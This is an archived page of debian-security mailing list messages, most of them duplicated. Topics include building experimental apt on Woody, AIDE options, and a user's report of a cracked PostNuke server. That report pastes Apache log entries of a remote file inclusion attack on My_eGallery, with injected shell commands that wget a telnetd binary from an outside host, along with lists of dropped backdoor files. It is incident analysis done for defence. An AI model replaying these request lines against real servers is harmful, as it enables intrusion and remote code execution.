date:20040119

Re: Release.gpg files gone?

2004-01-19 Thread Matt Zimmerman

On Mon, Jan 19, 2004 at 12:03:51PM +0200, Camillo S?rs wrote:

> Matt Zimmerman wrote:
> >This may have been the case with apt-secure, but this functionality is now
> >merged into apt 0.6 (currently in experimental) in a different way which
> >does not prevent downloads of unauthenticated packages altogether.  
> >Instead,
> >it requires confirmation.
> 
> Matt, I'm sure I'm not the only woody-user who has used the unofficial 
> apt-secure version.  I am trying to build the experimental (0.6.18) version 
> of the new apt on Woody as I write this, but there was more unsatisfied 
> dependencies than I am really comfortable with.
> 
> Have you attempted to build on Woody, and if so, what was the outcome?  Is 
> there any chance of getting a quick step-by-step build guide? Or is there 
> simply too much code that depends on newer library version for this to be 
> feasible?

Can you be more specific?  There are only two build-dependencies which could
be problematic:

One is the versioned dependency on docbook-utils, but that is only needed
for building the arch: all packages.  Do a -B (arch-dep only) build.

The other is the versioned dependency on debhelper, which was added because
of #204731.  That caused the man page installation to fail.  There is a
simple patch in the BTS which could probably be applied to the stable
version.

-- 
 - mdz

Re: Release.gpg files gone?

2004-01-19 Thread Matt Zimmerman

On Mon, Jan 19, 2004 at 12:03:51PM +0200, Camillo S?rs wrote:

> Matt Zimmerman wrote:
> >This may have been the case with apt-secure, but this functionality is now
> >merged into apt 0.6 (currently in experimental) in a different way which
> >does not prevent downloads of unauthenticated packages altogether.  
> >Instead,
> >it requires confirmation.
> 
> Matt, I'm sure I'm not the only woody-user who has used the unofficial 
> apt-secure version.  I am trying to build the experimental (0.6.18) version 
> of the new apt on Woody as I write this, but there was more unsatisfied 
> dependencies than I am really comfortable with.
> 
> Have you attempted to build on Woody, and if so, what was the outcome?  Is 
> there any chance of getting a quick step-by-step build guide? Or is there 
> simply too much code that depends on newer library version for this to be 
> feasible?

Can you be more specific?  There are only two build-dependencies which could
be problematic:

One is the versioned dependency on docbook-utils, but that is only needed
for building the arch: all packages.  Do a -B (arch-dep only) build.

The other is the versioned dependency on debhelper, which was added because
of #204731.  That caused the man page installation to fail.  There is a
simple patch in the BTS which could probably be applied to the stable
version.

-- 
 - mdz

-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: (php?) bug exploit report

2004-01-19 Thread J.H.M. Dassen (Ray)

On Mon, Jan 19, 2004 at 14:40:12 +0100, Csan wrote:
> One of my servers has been cracked into and I am looking for the weak
> spots of the system and also looking for ways to lock the secholes I might
> (also) have. The linux box is an up-to-date woody (incl. security
> updates).
> 
> My first question is how come such a thing worked on my box?

Apparently you installed PHP code that had a security vulnerability.

> "GET
> //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;
> HTTP/1.1" 200 7047

This appears to be exploiting the vulnerability described in
http://www.secunia.com/advisories/9721/
("myPHPNuke Arbitrary File Inclusion Vulnerability", 2003-09-12).

> (Debian unstable has version 0.732-4.2, so the first thing to do is to
> backport the unstable version. Or is it rather a php bug?:

No, it's a myPHPNuke bug; it doesn't do enough input validation (see
http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/input.html).

HTH,
Ray
-- 
[...] computer source code, though unintelligible to many, is the preferred
method of communication among computer programmers. 
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION=00a0117p.06

(php?) bug exploit report

2004-01-19 Thread Csan

Hello debian-security,

One of my servers has been cracked into and I am looking for the weak spots of
the system and also looking for ways to lock the secholes I might (also) have.
The linux box is an up-to-date woody (incl. security updates).

My first question is how come such a thing worked on my box? (I do not know php
myself at all):

"GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;
HTTP/1.1" 200 7047
[*] see bottom of this email for further occurences

The URL is part of a postnuke site and they could start up the telnetd binary
with invoking an URL similar to the above URL!
Is this a known sechole?

I am providing some further details about these cracks for others to be aware of
similar threats...:

PostNuke: The Phoenix Release (0.7.2.6)
(Debian unstable has version 0.732-4.2, so the first thing to do is to backport
the unstable version. Or is it rather a php bug?:

ii  libphp-adodb   1.51-1.1   The 'adodb' database abstraction layer for p
ii  libphp-phplot  4.4.6-2The graphic library for php.
ii  php3-cgi   3.0.18-23.1woo A server-side, HTML-embedded scripting langu
ii  php3-cgi-mysql 3.0.18-23.1woo Mysql module for PHP3 (cgi)
ii  php3-doc   3.0.18-23.1woo Documentation for PHP3
ii  php4   4.1.2-6woody3  A server-side, HTML-embedded scripting langu
ii  php4-cgi   4.1.2-6woody3  A server-side, HTML-embedded scripting langu
ii  php4-gd4.1.2-6woody3  GD module for php4
ii  php4-imap  4.1.2-6woody3  IMAP module for php4
ii  php4-ldap  4.1.2-6woody3  LDAP module for php4
ii  php4-mysql 4.1.2-6woody3  MySQL module for php4
ii  php4-pear  4.2.1-3PEAR - PHP Extension and Application Reposit
ii  php4-pear-log  1.1-1  Log module for PEAR
ii  php4-pgsql 4.1.2-4PostgreSQL module for php4
ii  phplib 7.2d-3.1   Library for easy writing web applications (s
ii  phpmyadmin 2.5.2-1woody2. A set of PHP-scripts to administrate MySQL o
ii  phpnuke6.0-10 A web portal and community system, mostly li
ii  phppgadmin 2.4.1-2A set of PHP-scripts to administrate Postgre
ii  phpsysinfo 2.0-3woody1PHP Based Host Information

)

$modversion['name'] = 'My_eGallery';  // Module Name
$modversion['version'] = '3.1.1';  // Version Number

The telnetd and other ELF executables they used and that were found in /tmp are
the following:

-rwxr-xr-x1 www-data www-data 2897 ptrace
-rwxrwxrwx1 www-data www-data19242 r0nin.txt
-rw-r--r--1 www-data www-data19242 r0nin.txt.1
-rw-r--r--1 www-data www-data19242 r0nin.txt.2
-rw-r--r--1 www-data www-data  1325904 r.txt
-rwxr-xr-x1 www-data www-data17643 suco.txt
-rwxrwxrwx1 www-data www-data   170613 telnetd
-rw-r--r--1 www-data www-data   170613 telnetd.1
-rw-r--r--1 www-data www-data   170613 telnetd.2
-rw-r--r--1 www-data www-data   170613 telnetd.3
-rwxr-xr-x1 www-data www-data17836 x
-rwxr-xr-x1 www-data www-data 5013 x0x
-rwsrwsrwt1 www-data www-data 7180 xiit
-rw-r--r--1 www-data www-data 7180 xiit.1
-rw-r--r--1 www-data www-data 7180 xiit.2

The following was found in the directory of displayCategory.php:

-rwxr-xr-x1 www-data www-data 6453 bd.cgi

Some other interesting details:

www-data 11584  0.0  0.1  2536 1288 ?S18:57   0:00 wget
http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt

a wget-log file was open in /tmp, containing:

--18:57:51--  http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
   => `r.txt'
Resolving www.cyberlordsteam.hpg.ig.com.br... done.
Connecting to www.cyberlordsteam.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,590,900 [text/plain]

 3% [>] 174,224  796.04B/s  ETA 1:32:28

And I also still got those binaries they used. Is anyone interested to take a
look at them?

Thank you.
Regs,

Csan

PS 1: Please Cc: me as I am not subscribed to the list. And I wouldn't like to,
if possible.
PS 2: further apache log crack entries:

200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 7047
200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd;
HTTP/1.1" 200 7047
200.234.12.110 - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 3856
adsl-67-36-72-129.dsl.sfldmi.ameritech.net - - "GET
/index/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20

Re: (php?) bug exploit report

2004-01-19 Thread J.H.M. Dassen (Ray)

On Mon, Jan 19, 2004 at 14:40:12 +0100, Csan wrote:
> One of my servers has been cracked into and I am looking for the weak
> spots of the system and also looking for ways to lock the secholes I might
> (also) have. The linux box is an up-to-date woody (incl. security
> updates).
> 
> My first question is how come such a thing worked on my box?

Apparently you installed PHP code that had a security vulnerability.

> "GET
> //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;
> HTTP/1.1" 200 7047

This appears to be exploiting the vulnerability described in
http://www.secunia.com/advisories/9721/
("myPHPNuke Arbitrary File Inclusion Vulnerability", 2003-09-12).

> (Debian unstable has version 0.732-4.2, so the first thing to do is to
> backport the unstable version. Or is it rather a php bug?:

No, it's a myPHPNuke bug; it doesn't do enough input validation (see
http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/input.html).

HTH,
Ray
-- 
[...] computer source code, though unintelligible to many, is the preferred
method of communication among computer programmers. 
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION=00a0117p.06


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

(php?) bug exploit report

2004-01-19 Thread Csan

Hello debian-security,

One of my servers has been cracked into and I am looking for the weak spots of
the system and also looking for ways to lock the secholes I might (also) have.
The linux box is an up-to-date woody (incl. security updates).

My first question is how come such a thing worked on my box? (I do not know php
myself at all):

"GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;
HTTP/1.1" 200 7047
[*] see bottom of this email for further occurences

The URL is part of a postnuke site and they could start up the telnetd binary
with invoking an URL similar to the above URL!
Is this a known sechole?

I am providing some further details about these cracks for others to be aware of
similar threats...:

PostNuke: The Phoenix Release (0.7.2.6)
(Debian unstable has version 0.732-4.2, so the first thing to do is to backport
the unstable version. Or is it rather a php bug?:

ii  libphp-adodb   1.51-1.1   The 'adodb' database abstraction layer for p
ii  libphp-phplot  4.4.6-2The graphic library for php.
ii  php3-cgi   3.0.18-23.1woo A server-side, HTML-embedded scripting langu
ii  php3-cgi-mysql 3.0.18-23.1woo Mysql module for PHP3 (cgi)
ii  php3-doc   3.0.18-23.1woo Documentation for PHP3
ii  php4   4.1.2-6woody3  A server-side, HTML-embedded scripting langu
ii  php4-cgi   4.1.2-6woody3  A server-side, HTML-embedded scripting langu
ii  php4-gd4.1.2-6woody3  GD module for php4
ii  php4-imap  4.1.2-6woody3  IMAP module for php4
ii  php4-ldap  4.1.2-6woody3  LDAP module for php4
ii  php4-mysql 4.1.2-6woody3  MySQL module for php4
ii  php4-pear  4.2.1-3PEAR - PHP Extension and Application Reposit
ii  php4-pear-log  1.1-1  Log module for PEAR
ii  php4-pgsql 4.1.2-4PostgreSQL module for php4
ii  phplib 7.2d-3.1   Library for easy writing web applications (s
ii  phpmyadmin 2.5.2-1woody2. A set of PHP-scripts to administrate MySQL o
ii  phpnuke6.0-10 A web portal and community system, mostly li
ii  phppgadmin 2.4.1-2A set of PHP-scripts to administrate Postgre
ii  phpsysinfo 2.0-3woody1PHP Based Host Information

)

$modversion['name'] = 'My_eGallery';  // Module Name
$modversion['version'] = '3.1.1';  // Version Number

The telnetd and other ELF executables they used and that were found in /tmp are
the following:

-rwxr-xr-x1 www-data www-data 2897 ptrace
-rwxrwxrwx1 www-data www-data19242 r0nin.txt
-rw-r--r--1 www-data www-data19242 r0nin.txt.1
-rw-r--r--1 www-data www-data19242 r0nin.txt.2
-rw-r--r--1 www-data www-data  1325904 r.txt
-rwxr-xr-x1 www-data www-data17643 suco.txt
-rwxrwxrwx1 www-data www-data   170613 telnetd
-rw-r--r--1 www-data www-data   170613 telnetd.1
-rw-r--r--1 www-data www-data   170613 telnetd.2
-rw-r--r--1 www-data www-data   170613 telnetd.3
-rwxr-xr-x1 www-data www-data17836 x
-rwxr-xr-x1 www-data www-data 5013 x0x
-rwsrwsrwt1 www-data www-data 7180 xiit
-rw-r--r--1 www-data www-data 7180 xiit.1
-rw-r--r--1 www-data www-data 7180 xiit.2

The following was found in the directory of displayCategory.php:

-rwxr-xr-x1 www-data www-data 6453 bd.cgi

Some other interesting details:

www-data 11584  0.0  0.1  2536 1288 ?S18:57   0:00 wget
http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt

a wget-log file was open in /tmp, containing:

--18:57:51--  http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
   => `r.txt'
Resolving www.cyberlordsteam.hpg.ig.com.br... done.
Connecting to www.cyberlordsteam.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,590,900 [text/plain]

 3% [>] 174,224  796.04B/s  ETA 1:32:28

And I also still got those binaries they used. Is anyone interested to take a
look at them?

Thank you.
Regs,

Csan

PS 1: Please Cc: me as I am not subscribed to the list. And I wouldn't like to,
if possible.
PS 2: further apache log crack entries:

200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 7047
200.249.4.237 - - "GET
//modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd;
HTTP/1.1" 200 7047
200.234.12.110 - - "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a;pwd
HTTP/1.1" 200 3856
adsl-67-36-72-129.dsl.sfldmi.ameritech.net - - "GET
/index/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20

Re: Release.gpg files gone?

2004-01-19 Thread Camillo Särs


Matt Zimmerman wrote:

This may have been the case with apt-secure, but this functionality is now
merged into apt 0.6 (currently in experimental) in a different way which
does not prevent downloads of unauthenticated packages altogether.  Instead,
it requires confirmation.


Matt, I'm sure I'm not the only woody-user who has used the unofficial 
apt-secure version.  I am trying to build the experimental (0.6.18) version of 
the new apt on Woody as I write this, but there was more unsatisfied 
dependencies than I am really comfortable with.


Have you attempted to build on Woody, and if so, what was the outcome?  Is 
there any chance of getting a quick step-by-step build guide? Or is there 
simply too much code that depends on newer library version for this to be 
feasible?


Running dpkg-buildpackage with the "-d" option does not really make me 
confident that I can replace the current apt with the new one... :)


Cheers,
Camillo
--
Camillo Särs <[EMAIL PROTECTED]>  **  Aim for the impossible and you
 **   will achieve the improbable.
PGP public key available **

Re: Release.gpg files gone?

2004-01-19 Thread Camillo Särs

Matt Zimmerman wrote:
This may have been the case with apt-secure, but this functionality is now
merged into apt 0.6 (currently in experimental) in a different way which
does not prevent downloads of unauthenticated packages altogether.  Instead,
it requires confirmation.
Matt, I'm sure I'm not the only woody-user who has used the unofficial 
apt-secure version.  I am trying to build the experimental (0.6.18) version of 
the new apt on Woody as I write this, but there was more unsatisfied 
dependencies than I am really comfortable with.

Have you attempted to build on Woody, and if so, what was the outcome?  Is 
there any chance of getting a quick step-by-step build guide? Or is there 
simply too much code that depends on newer library version for this to be 
feasible?

Running dpkg-buildpackage with the "-d" option does not really make me 
confident that I can replace the current apt with the new one... :)

Cheers,
Camillo
--
Camillo Särs <[EMAIL PROTECTED]>  **  Aim for the impossible and you
 **   will achieve the improbable.
PGP public key available **
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: aide, apt-get and remote management...

2004-01-19 Thread Lupe Christoph

On Sunday, 2004-01-18 at 13:22:27 -0800, Johannes Graumann wrote:
> Hello,

> Where are the options below from?
> I run aide 0.10, which is according to the sourceforge site the current
> one and it doesn't like it. Also as someone else mentioned:
> http://www.cs.tut.fi/~rammer/aide.html says "Future plans: ...
> Encrypted and signed database".

They are in the Debian source package. I haven't gotten around to
investigating how they work, though.

Lupe Christoph
-- 
| [EMAIL PROTECTED]   |   http://www.lupe-christoph.de/ |
| "Violence is the resort of the violent" Lu Tze |
| "Thief of Time", Terry Pratchett   |

Re: aide, apt-get and remote management...

2004-01-19 Thread Lupe Christoph

On Sunday, 2004-01-18 at 13:22:27 -0800, Johannes Graumann wrote:
> Hello,

> Where are the options below from?
> I run aide 0.10, which is according to the sourceforge site the current
> one and it doesn't like it. Also as someone else mentioned:
> http://www.cs.tut.fi/~rammer/aide.html says "Future plans: ...
> Encrypted and signed database".

They are in the Debian source package. I haven't gotten around to
investigating how they work, though.

Lupe Christoph
-- 
| [EMAIL PROTECTED]   |   http://www.lupe-christoph.de/ |
| "Violence is the resort of the violent" Lu Tze |
| "Thief of Time", Terry Pratchett   |


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Release.gpg files gone?

Re: Release.gpg files gone?

Re: (php?) bug exploit report

(php?) bug exploit report

Re: (php?) bug exploit report

(php?) bug exploit report

Re: Release.gpg files gone?

Re: Release.gpg files gone?

Re: aide, apt-get and remote management...

Re: aide, apt-get and remote management...

10 matches

Site Navigation

Mail list logo

Footer information